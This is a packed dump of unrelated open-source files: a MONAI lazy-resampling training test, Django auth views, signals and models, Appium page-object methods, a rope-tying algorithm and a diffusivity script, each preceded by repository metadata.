2)), mt.ScaleIntensityd(keys="img"), mt.ApplyPendingd(keys=["seg"]), mt.RandCropByPosNegLabeld( keys=["img", "seg"], label_key="seg", spatial_size=[76, 82, 80], pos=1, neg=1, num_samples=4 ), mt.RandRotate90d(keys=["img", "seg"], prob=0.8, spatial_axes=(0, 2)), mt.RandZoomd( keys=["img", "seg"], prob=1.0, min_zoom=1.0, max_zoom=1.0, mode=("trilinear", 0), keep_size=True ), mt.ResizeWithPadOrCropD(keys=["img", "seg"], spatial_size=[80, 72, 80]), mt.Rotated(keys=["img", "seg"], angle=[np.pi / 2, np.pi / 2, 0], mode="nearest", keep_size=False), mt.Lambdad(keys=["img"], func=_no_op), ], lazy=lazy, overrides=lazy_kwargs, log_stats=num_workers > 0, ) # create a training data loader if cachedataset == 2: train_ds = monai.data.CacheDataset( data=train_files, transform=train_transforms, cache_rate=0.8, runtime_cache=False, num_workers=0 ) elif cachedataset == 3: train_ds = monai.data.LMDBDataset(data=train_files, transform=train_transforms, cache_dir=root_dir) else: train_ds = monai.data.Dataset(data=train_files, transform=train_transforms) # create UNet, DiceLoss and Adam optimizer model = monai.networks.nets.UNet( spatial_dims=3, in_channels=1, out_channels=1, channels=(2, 2, 2, 2), strides=(2, 2, 2), num_res_units=2 ).to(device) optimizer = torch.optim.Adam(model.parameters(), 5e-4) loss_function = monai.losses.DiceLoss(sigmoid=True) saver = mt.SaveImage( output_dir=os.path.join(root_dir, "output"), dtype=np.float32, output_ext=".nii.gz", output_postfix=f"seg_{lazy}_{num_workers}", mode="bilinear", resample=False, separate_folder=False, print_log=False, ) inverter = mt.Invertd( keys="seg", orig_keys="img", transform=mt.Compose(train_transforms.transforms[-5:]), to_tensor=True ) # use batch_size=2 to load images and use RandCropByPosNegLabeld to generate 2 x 4 images for network training _g = torch.Generator() _g.manual_seed(0) set_determinism(0) train_loader = monai.data.DataLoader( train_ds, batch_size=1, shuffle=True, num_workers=num_workers, generator=_g, persistent_workers=num_workers > 0 ) all_coords = set() batch_data = None for epoch in range(5): print("-" * 10) print(f"Epoch {epoch + 1}/5") for step, batch_data in enumerate(train_loader, start=1): inputs, labels = batch_data["img"].to(device), batch_data["seg"].to(device) optimizer.zero_grad() outputs = model(inputs) loss = loss_function(outputs, labels) loss.backward() optimizer.step() epoch_len = len(train_ds) // train_loader.batch_size print(f"{step}/{epoch_len}, train_loss:{loss.item():0.4f}") for item, in_img, in_seg in zip(outputs, inputs, labels): # this decollates the batch, pt 1.9+ item.copy_meta_from(in_img) np.testing.assert_array_equal(item.pending_operations, []) np.testing.assert_array_equal(in_seg.pending_operations, []) ops = [0] if len(item.applied_operations) > 1: found = False for idx, n in enumerate(item.applied_operations): # noqa if n["class"] == "RandCropByPosNegLabel": found = True break if found: ops = item.applied_operations[idx]["extra_info"]["extra_info"]["cropped"] img_name = os.path.basename(item.meta["filename_or_obj"]) coords = f"{img_name} - {ops}" print(coords) # np.testing.assert_allclose(coords in all_coords, False) all_coords.add(coords) saver(item) # just testing the saving saver(in_img) saver(in_seg) invertible, reasons = has_status_keys(batch_data, TraceStatusKeys.PENDING_DURING_APPLY) inverted = [inverter(b_data) for b_data in decollate_batch(batch_data)] # expecting no error return ops @skip_if_quick @SkipIfBeforePyTorchVersion((1, 11)) class IntegrationLazyResampling(DistTestCase): def setUp(self): monai.config.print_config() set_determinism(seed=0) self.data_dir = tempfile.mkdtemp() for i in range(3): im, seg = create_test_image_3d(128, 128, 128, num_seg_classes=1, channel_dim=-1) n = nib.Nifti1Image(im, np.eye(4)) nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz")) n = nib.Nifti1Image(seg, np.eye(4)) nib.save(n, os.path.join(self.data_dir, f"seg{i:d}.nii.gz")) self.device = "cuda:0" if torch.cuda.is_available() else "cpu:0" def tearDown(self): set_determinism(seed=None) shutil.rmtree(self.data_dir) def train_and_infer(self, idx=0): results = [] _readers = (None, None) _w = 2 if idx == 1: _readers = ("itkreader", "itkreader") _w = 1 elif idx == 2: _readers = ("itkreader", "nibabelreader") _w = 0 results_expected = run_training_test( self.data_dir, device=self.device, cachedataset=0, readers=_readers, num_workers=_w, lazy=False ) results = run_training_test( self.data_dir, device=self.device, cachedataset=idx, readers=_readers, num_workers=_w, lazy=True ) self.assertFalse(np.allclose(results, [0])) self.assertFalse(np.allclose(results_expected, [0])) np.testing.assert_allclose(results, results_expected) lazy_files = glob(os.path.join(self.data_dir, "output", "*_True_*.nii.gz")) regular_files = glob(os.path.join(self.data_dir, "output", "*_False_*.nii.gz")) diffs = [] for a, b in zip(sorted(lazy_files), sorted(regular_files)): img_lazy = mt.LoadImage(image_only=True)(a) img_regular = mt.LoadImage(image_only=True)(b) diff = np.size(img_lazy) - np.sum(np.isclose(img_lazy, img_regular, atol=1e-4)) diff_rate = diff / np.size(img_lazy) diffs.append(diff_rate) np.testing.assert_allclose(diff_rate, 0.0, atol=0.03) print("volume diff:", diffs) def test_training(self): for i in range(4): self.train_and_infer(i) if __name__ == "__main__": unittest.main()
ce7936e9279838ce773a5d1c8ec644b1ab44048f
ce55c319f5a78b69fefc63595d433864a2e531b5
/前后端分离-vue-DRF/Projects-lenongke/LNK/apps/users/signals.py
43a056d613cf142a3a112d980f3a8db7cfac5f0d
[]
no_license
Suijng/1809_data
a072c875e8746190e3b715e53f1afe3323f4666b
45f8a57089f5c30ccc1a3cddb03b76dc95355417
refs/heads/master
2022-12-21T12:38:30.458291
2019-09-27T01:14:41
2019-09-27T01:14:41
211,207,071
0
0
null
2022-11-22T03:16:18
2019-09-27T00:55:21
HTML
UTF-8
Python
false
false
579
py
# post_save Django中的model对象保存后,自动触发 from django.db.models.signals import post_save from django.dispatch import receiver from django.contrib.auth import get_user_model # 获取用户模型 User = get_user_model() @receiver(post_save,sender=User) # 监控用户User模型 def create_user(sender,instance=None,created=False,**kwargs): # created: 表示是否已经创建 if created: # 获取用户的密码 password = instance.password # 加密 instance.set_password(password) # 保存 instance.save()
99bdd4f3712583d0eca467f97b1c076141596f60
7edafb8e10c31bffd12420a4cee61d0a841fd226
/YunluFramework/public/handle/renmai/RENMAIHANDLE5.py
c53467af7c700dc0002bde67039eec60351ee5c0
[]
no_license
xiao2912008572/Appium
ca11d2cf82f9dcc051e9b719eb09f862f07621bf
3931957a8ae9b4ee2acc13ae4aba0ba46b6d842b
refs/heads/master
2021-01-21T12:27:36.243484
2018-09-12T09:25:35
2018-09-12T09:25:35
102,071,447
8
2
null
null
null
null
UTF-8
Python
false
false
9,492
py
__author__ = 'Administrator' from YunluFramework.public.handle.renmai.RENMAIHANDLE4 import RENMAIHANDLE4 class RENMAIHANDLE5(RENMAIHANDLE4): #*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-设置:RMSY_search_label_groupchat_menu_setting********************************* #定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群头像:点击 def RMSY_search_label_groupchat_menu_setting_grouphead_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu_setting_grouphead) #定位:人脉首页-搜索-标签列表-点击进入群聊-设置-返回:点击 def RMSY_search_label_groupchat_menu_setting_back_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu_setting_back) #定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群名称:点击 def RMSY_search_label_groupchat_menu_setting_groupname_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu_setting_groupname) #*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-热度设置:RMSY_search_label_groupchat_menu_heatsetting********************************* #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-返回:点击 def RMSY_search_label_groupchat_menu_heatsetting_back_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_back) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-消息:点击 def RMSY_search_label_groupchat_menu_heatsetting_msg_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_msg) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-飘泡:点击 def RMSY_search_label_groupchat_menu_heatsetting_bubble_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bubble) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-震动:点击 def RMSY_search_label_groupchat_menu_heatsetting_shock_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_shock) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-铃声:点击 def RMSY_search_label_groupchat_menu_heatsetting_bell_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bell) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-确定:点击 def RMSY_search_label_groupchat_menu_heatsetting_confirm_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_confirm) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-周期:点击 def RMSY_search_label_groupchat_menu_heatsetting_period_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_period) #定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-时段:点击 def RMSY_search_label_groupchat_menu_heatsetting_time_click(self): return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_time) #*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-人群按钮:RMSY_search_label_groupchat_groupbtn********************************* #定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-返回:点击 def RMSY_search_label_groupchat_groupbtn_back_click(self): return self.p.click(self.RMSY_search_label_groupchat_groupbtn_back) #定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-联系人列表:点击 def RMSY_search_label_groupchat_groupbtn_Contacts_click(self, n): return self.p.clicks(self.RMSY_search_label_groupchat_groupbtn_Contacts,n) #定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息输入框:输入 def RMSY_search_label_groupchat_groupbtn_msginput_sendkeys(self, msg): return self.p.send_keys(self.RMSY_search_label_groupchat_groupbtn_msginput, msg) #定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息按钮:点击 def RMSY_search_label_groupchat_groupbtn_msgbtn_click(self): return self.p.click(self.RMSY_search_label_groupchat_groupbtn_msgbtn) #*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期:RMSY_contacts_menu_heatsetting_p2pconversation_period********************************* #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-返回:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_back_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_back) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-每天:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-工昨日:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_workday_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_workday) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-节假日:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-择日:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-保存:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_period_save_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_save) #*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段:RMSY_contacts_menu_heatsetting_p2pconversation_time********************************* #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-确定:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm) #定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-取消:点击 def RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel_click(self): return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel) #*********************************【PAGE3】人脉首页-点击联系人-消息-热度设置-周期:RMSY_contacts_msg_menu_heatsetting_period********************************* #定位:人脉首页-点击联系人-消息-热度设置-周期-返回:点击 def RMSY_contacts_msg_menu_heatsetting_period_back_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_back) #定位:人脉首页-点击联系人-消息-热度设置-周期-每天:点击 def RMSY_contacts_msg_menu_heatsetting_period_everyday_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_everyday) #定位:人脉首页-点击联系人-消息-热度设置-周期-工昨日:点击 def RMSY_contacts_msg_menu_heatsetting_period_workday_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_workday) #定位:人脉首页-点击联系人-消息-热度设置-周期-节假日:点击 def RMSY_contacts_msg_menu_heatsetting_period_holiday_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_holiday) #定位:人脉首页-点击联系人-消息-热度设置-周期-择日:点击 def RMSY_contacts_msg_menu_heatsetting_period_selectday_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_selectday) #定位:人脉首页-点击联系人-消息-热度设置-周期-保存:点击 def RMSY_contacts_msg_menu_heatsetting_period_save_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_save) #*********************************【PAGE4】人脉首页-点击联系人-消息-热度设置-时段:RMSY_contacts_msg_menu_heatsetting_time********************************* #定位:人脉首页-点击联系人-消息-热度设置-时段-确定:点击 def RMSY_contacts_msg_menu_heatsetting_time_confirm_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_confirm) #定位:人脉首页-点击联系人-消息-热度设置-时段-取消:点击 def RMSY_contacts_msg_menu_heatsetting_time_cancel_click(self): return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_cancel)
1489a49a4e6ccd3697af23f1e682ca9574953838
efe6c52938fe5c7a259514ad317484057edfeff7
/tube/models.py
7526f1fa46150f5b12037f9489d41f329289eb0d
[]
no_license
seiya0723/video_site_02
69413879248a2cc314dd5c83c9bedb564e170aba
5ffcccb1f64b83bb3bf1c9bfd42c9896ff28eb85
refs/heads/master
2023-03-31T21:02:25.877950
2021-04-14T00:45:14
2021-04-14T00:45:14
357,728,585
0
0
null
null
null
null
UTF-8
Python
false
false
438
py
from django.db import models from django.utils import timezone class Video(models.Model): class Meta: db_table = "video" title = models.CharField(verbose_name="タイトル", max_length=30) comment = models.CharField(verbose_name="動画説明文", max_length=2000) dt = models.DateTimeField(verbose_name="投稿日", default=timezone.now) def __str__(self): return self.title
[ "seiya@asahina" ]
seiya@asahina
bfba43a40c44ed33df829ed9cd1755d9c69e70f7
736250d9d14552c5fa0aca25b25d9c8a28fcd1a0
/sssionpro/manage.py
3b9b39fa5263b2fcca0a11cb1b35b13a433a6d39
[]
no_license
maheswatapradhan/feedback
57f052a2082902cb8a72b474e0b863b7a00d1c9c
31c7dcb113a38e29b3a56481fcb9ae2fce7d61a2
refs/heads/master
2020-09-15T23:42:32.041306
2019-11-23T12:54:25
2019-11-23T12:54:25
223,585,900
0
0
null
null
null
null
UTF-8
Python
false
false
252
py
#!/usr/bin/env python import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)
e5c3105a3f2f825626898ed2c619b599f820a0e9
f1a8e308c76866e2fba20401e6f1d5842dd60c46
/Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py
0ca4144df73641761d8095f25ec57753846b4744
[]
no_license
harman666666/Algorithms-Data-Structures-and-Design
6e5da0c1f701e7dfc7b045ecd1209463131d3fc7
483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc
refs/heads/master
2021-07-14T10:11:27.588838
2021-07-07T01:47:42
2021-07-07T01:47:42
101,330,760
3
1
null
2018-10-15T04:52:07
2017-08-24T19:32:03
Python
UTF-8
Python
false
false
2,234
py
''' There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I]. We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again. For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal. For example, consider K = 4 and array A such that: A[0] = 1 A[1] = 2 A[2] = 3 A[3] = 4 A[4] = 1 A[5] = 1 A[6] = 3 The ropes are shown in the figure below. We can tie: rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5; rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5. After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes. Write a function: def solution(K, A) that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created. For example, given K = 4 and array A such that: A[0] = 1 A[1] = 2 A[2] = 3 A[3] = 4 A[4] = 1 A[5] = 1 A[6] = 3 the function should return 3, as explained above. Write an efficient algorithm for the following assumptions: N is an integer within the range [1..100,000]; K is an integer within the range [1..1,000,000,000]; each element of array A is an integer within the range [1..1,000,000,000]. ''' # you can write to stdout for debugging purposes, e.g. # print("this is a debug message") def solution(K, A): ''' Identify ropes that are smaller, than K, and merge them together. but dont merge with a rope that is already greater than K. Or just look at first rope, if its less than K, merge with right one, ''' sum = 0 count = 0 for i in A: if (sum + i) >= K: count += 1 sum = 0 else: sum += i return count
685fda18ad8cf4719f324feb24e823122bb0d341
795df757ef84073c3adaf552d5f4b79fcb111bad
/stochastic_diffusion/diffusivity_1d_xk.py
62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c
[]
no_license
tnakaicode/jburkardt-python
02cb2f9ba817abf158fc93203eb17bf1cb3a5008
1a63f7664e47d6b81c07f2261b44f472adc4274d
refs/heads/master
2022-05-21T04:41:37.611658
2022-04-09T03:31:00
2022-04-09T03:31:00
243,854,197
3
0
null
null
null
null
UTF-8
Python
false
false
4,885
py
#! /usr/bin/env python3 # def diffusivity_1d_xk ( dc0, m, omega, n, x ): #*****************************************************************************80 # ## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function. # # Discussion: # # The 1D diffusion equation has the form # # - d/dx ( DC(X) Del U(X) ) = F(X) # # where DC(X) is a function called the diffusivity. # # In the stochastic version of the problem, the diffusivity function # includes the influence of stochastic parameters: # # - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X). # # In this function, the domain is assumed to be the unit interval [0.1]. # # # For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0, # U(1OMEGA) = 1, the exact solution is # # If OMEGA ~= 0: # # U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA ) # # If OMEGA = 0: # # U(XOMEGA) = X # # In the numerical experiments described in the paper, OMEGA was taken # to be a random variable with a Beta, or Uniform, or Gaussian or # Poisson or Binomial distribution. # # For the Gaussian and Poisson distributions, the positivity requirement could not # be guaranteed, and the experiments were simply made with a "small" # variance of 0.1. # # Licensing: # # This code is distributed under the GNU LGPL license. # # Modified: # # 20 December 2009 # # Author: # # John Burkardt # # Reference: # # Dongbin Xiu, George Karniadakis, # Modeling uncertainty in steady state diffusion problems via # generalized polynomial chaos, # Computer Methods in Applied Mechanics and Engineering, # Volume 191, 2002, pages 4927-4948. # # Parameters: # # Input, real DC0, the constant term in the expansion of the # diffusion coefficient. # # Input, integer M, the number of stochastic parameters. # # Input, real OMEGA(M), the stochastic parameters. # # Input, integer N, the number of evaluation points. # # Input, real X(N), the point where the diffusion coefficient is to # be evaluated. # # Output, real DC(N), the value of the diffusion coefficient at X. # import numpy as np k = 0 w = 1.0 arg = np.zeros(n) while ( k < m ): if ( k < m ): arg = arg + omega[k] * np.sin ( w * np.pi * x ) k = k + 1 if ( k < m ): arg = arg + omega[k] * np.cos ( w * np.pi * x ) k = k + 1 w = w + 1.0 arg = np.exp ( - 0.125 ) * arg dc = dc0 + np.exp ( arg ) return dc def diffusivity_1d_xk_contour ( ): #*****************************************************************************80 # ## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function. # # Discussion: # # The diffusivity function is compute by DIFFUSIVITY_1D_XK. # # Licensing: # # This code is distributed under the GNU LGPL license. # # Modified: # # 08 February 2019 # # Author: # # John Burkardt # # Reference: # # Dongbin Xiu, George Karniadakis, # Modeling uncertainty in steady state diffusion problems via # generalized polynomial chaos, # Computer Methods in Applied Mechanics and Engineering, # Volume 191, 2002, pages 4927-4948. # import matplotlib.pyplot as plt import numpy as np print ( '' ) print ( 'diffusivity_1d_xk_contour' ) print ( ' Display the stochastic diffusivity function' ) print ( ' defined by DIFFUSIVITY_1D_XK.' ) # # Set the spatial grid. # n = 51 x_min = -1.0 x_max = +1.0 x = np.linspace ( x_min, x_max, n ) # # Sample the OMEGA values. # Use a seed of 0 for the MATLAB random number generator. # m = 5 omega = np.random.randn ( m ) # # Compute the diffusivity field. # dc0 = 10.0 dc = diffusivity_1d_xk ( dc0, m, omega, n, x ) # # Plot the diffusivity field. # plt.plot ( x, dc, linewidth = 2 ) plt.grid ( True ) plt.xlabel ( '<--- X --->' ) plt.ylabel ( 'DC(X)' ) plt.title ( 'XK Stochastic diffusivity function' ) filename = 'diffusivity_1d_xk.png' plt.savefig ( filename ) print ( '' ) print ( ' Graphics saved as "%s".' % ( filename ) ) return def diffusivity_1d_xk_test ( ): #*****************************************************************************80 # ## diffusivity_1d_xk_test tests diffusivity_1d_xk. # # Licensing: # # This code is distributed under the GNU LGPL license. # # Modified: # # 08 February 2019 # # Author: # # John Burkardt # # Parameters: # # None # import platform print ( '' ) print ( 'diffusivity_1d_xk_test:' ) print ( ' Python version: %s' % ( platform.python_version ( ) ) ) print ( ' Test diffusivity_1d_xk.' ) diffusivity_1d_xk_contour ( ) # # Terminate. # print ( '' ) print ( 'diffusivity_1d_xk_test:' ) print ( ' Normal end of execution.' ) return if ( __name__ == '__main__' ): from timestamp import timestamp timestamp ( ) diffusivity_1d_xk_test ( ) timestamp ( )
f4f21fb5b2c269df3326b786e78e6edc3d4fb923
5b002b82b025ee371432b436a0c19b000a0df2dd
/setup.py
93cb4423f1905fc32138f022a24043d62d1e8831
[ "Apache-2.0" ]
permissive
mvexel/whathappened
c5bfeeb1f41b20cd2f5f4c7782412a39090868b2
92805128d2a01909d89fca0650b585d8cac256e0
refs/heads/master
2021-01-19T09:10:53.189344
2017-04-10T00:05:24
2017-04-10T00:05:24
87,735,951
2
0
null
null
null
null
UTF-8
Python
false
false
220
py
from setuptools import setup setup( name='whathappened', packages=['whathappened'], include_package_data=True, install_requires=[ 'flask', 'requests', 'gunicorn==19.7.0' ], )
a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c
c8f023c1e2c9ecb9ffe328044ef3f013de0857a7
/src/apps/authentication/views.py
2523e22d739640c45818632c83a2d47a605d0269
[ "MIT" ]
permissive
snicoper/django-boilerplate
851932459fca8b4a6c9220d8ad3ca8f94b14b7a2
88cc24c3a2e935fd1be139368288cae6c38679e4
refs/heads/master
2021-01-18T18:40:36.633342
2018-10-15T07:54:59
2018-10-15T07:54:59
29,604,293
1
1
null
null
null
null
UTF-8
Python
false
false
7,839
py
from django.conf import settings from django.contrib import messages from django.contrib.auth import get_user_model, views from django.contrib.auth.mixins import LoginRequiredMixin from django.contrib.sites.shortcuts import get_current_site from django.shortcuts import get_object_or_404, redirect, render from django.urls import reverse, reverse_lazy from django.utils.translation import ugettext as _ from django.views import generic from utils.http import get_full_path from utils.mail import send_templated_mail from utils.mixins.views import AnonymousRequiredMixin from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm from .models import RegisterUser, UserEmailUpdate UserModel = get_user_model() class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView): template_name = 'authentication/register.html' form_class = RegisterUserForm model = RegisterUser def __init__(self, *args, **kwargs): """Elimina posibles usuarios expirados.""" RegisterUser.objects.delete_expired_users_temp() super().__init__(*args, **kwargs) def get_success_url(self): """Si todo OK, envía el email para verificación y redirecciona.""" self._send_email_with_token() return reverse('authentication:success') def _send_email_with_token(self): """Envía un email con token para terminar proceso de registro.""" current_site = get_current_site(self.request) site_name = current_site.name url_validate_token = get_full_path( self.request, 'authentication:validate_token', token=self.object.token ) context = { 'username': self.object.username, 'email': self.object.email, 'site_name': site_name, 'url_validate_token': url_validate_token } send_templated_mail( subject=_(f'Validación de email en {site_name}'), from_email=settings.GROUP_EMAILS['NO-REPLY'], recipients=[self.object.email], context=context, template_text='authentication/emails/register_success.txt' ) class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView): template_name = 'authentication/success.html' class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView): """Validación email de un nuevo registro a través del token.""" template_name = 'authentication/validate_token.html' def get(self, request, *args, **kwargs): RegisterUser.objects.delete_expired_users_temp() token = self.kwargs.get('token') try: user_temp = RegisterUser.objects.get(token=token) except RegisterUser.DoesNotExist: return render(request, 'authentication/token_not_exists.html') RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp) messages.success(request, _('El registro se ha completado con éxito')) return redirect(reverse('authentication:login')) class LoginView(AnonymousRequiredMixin, views.LoginView): template_name = 'authentication/login.html' form_class = AuthenticationForm class LogoutView(LoginRequiredMixin, views.LogoutView): template_name = 'authentication/logged_out.html' class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView): template_name = 'authentication/password_reset_form.html' email_template_name = 'authentication/emails/password_reset_email.html' subject_template_name = 'authentication/emails/password_reset_subject.txt' success_url = reverse_lazy('authentication:password_reset_done') class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView): template_name = 'authentication/password_reset_done.html' class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView): template_name = 'authentication/password_reset_confirm.html' success_url = reverse_lazy('authentication:password_reset_complete') class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView): template_name = 'authentication/password_reset_complete.html' class PasswordChangeView(views.PasswordChangeView): template_name = 'authentication/password_change_form.html' success_url = reverse_lazy('authentication:password_change_done') class PasswordChangeDoneView(views.PasswordChangeDoneView): template_name = 'authentication/password_change_done.html' class UserEmailUpdateView(LoginRequiredMixin, generic.FormView): template_name = 'authentication/email_update.html' form_class = UserEmailUpdateForm model = UserEmailUpdate def get_initial(self): """Establece datos en los campos del form.""" initial = super().get_initial() initial['user'] = self.request.user.id initial['token'] = UserEmailUpdate.objects.generate_unique_token() initial['new_email'] = self.request.user.email return initial def form_valid(self, form): """Envía el email de confirmación.""" new_email = form.cleaned_data['new_email'] token = form.cleaned_data['token'] UserEmailUpdate.objects.update_or_create( defaults={'new_email': new_email, 'token': token}, user=self.request.user ) self._send_confirm_email_for_validate(token, new_email) return super().form_valid(form) def get_success_url(self): msg = _('Se ha enviado un email a la nueva dirección para la confirmación') messages.success(self.request, msg) return reverse('accounts:profile') def _send_confirm_email_for_validate(self, token, new_email): """Envía un email para la confirmación del nuevo email con un token.""" current_site = get_current_site(self.request) url_validate_token = get_full_path( self.request, 'authentication:email_update_validate', token=token ) context = { 'url_validate_token': url_validate_token, 'site_name': current_site.name } send_templated_mail( subject=_('Confirmación cambio de email'), from_email=settings.GROUP_EMAILS['NO-REPLY'], recipients=[new_email], context=context, template_text='authentication/emails/email_update_confirm.txt' ) class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View): """Verifica el token de cambio de email. Para mayor seguridad, el usuario ha de estar logueado. Una vez comprobado y actualizado el nuevo email, elimina el email temporal. """ def get(self, request, *args, **kwargs): """Comprueba el token que coincida.""" token = kwargs.get('token') try: email_update = UserEmailUpdate.objects.get(token=token, user=request.user) except UserEmailUpdate.DoesNotExist: return redirect('authentication:token_email_not_exists') self.request.user.email = email_update.new_email self.request.user.save() email_update.delete() messages.success(request, _('Se ha actualizado el email')) return redirect(reverse('accounts:profile')) class UserEmailUpdateNotFoundView(generic.TemplateView): """El token no existe o no pertenece al usuario.""" template_name = 'authentication/token_email_not_exists.html' class UserRemoveEmailUpdateView(generic.View): """Eliminar un email no confirmado por parte del usuario.""" def post(self, request, *args, **kwargs): get_object_or_404(UserEmailUpdate, user=request.user).delete() messages.success(request, _('Email eliminado con éxito')) return redirect(reverse('accounts:profile'))
18cca05e8062f4f535054f5fd1a51304be50beb2
052275c2dd6d59a0d0fcfe85591b44106343662b
/listings/urls.py
a3b13c17beedfeffab4f7f72383dfe1ae84efa0b
[]
no_license
nimadorostkar/Django-Real-Estate
93d104ad1847674103e525ae428af186fffa9e30
bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9
refs/heads/master
2023-08-10T17:07:29.829253
2021-09-19T10:55:47
2021-09-19T10:55:47
338,533,461
23
9
null
null
null
null
UTF-8
Python
false
false
281
py
from django.urls import path from .views import (ListingListView, ListingDetailView, search) urlpatterns = [ path('', ListingListView.as_view(), name='listings'), path('<int:pk>', ListingDetailView.as_view(), name='listing'), path('search', search, name='search'), ]
0efcee193c5cdeb0e1fe1f35336a1798a94c1084
59080f5116b9e8f625b5cc849eb14b7ff9d19f3d
/122 rabbitmq/producer.py
f519020c40c53d1b353416228a61b9216f10522a
[]
no_license
yyq1609/Python_road
eda2bcd946b480a05ec31cdcb65e35b3f3e739d1
e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49
refs/heads/master
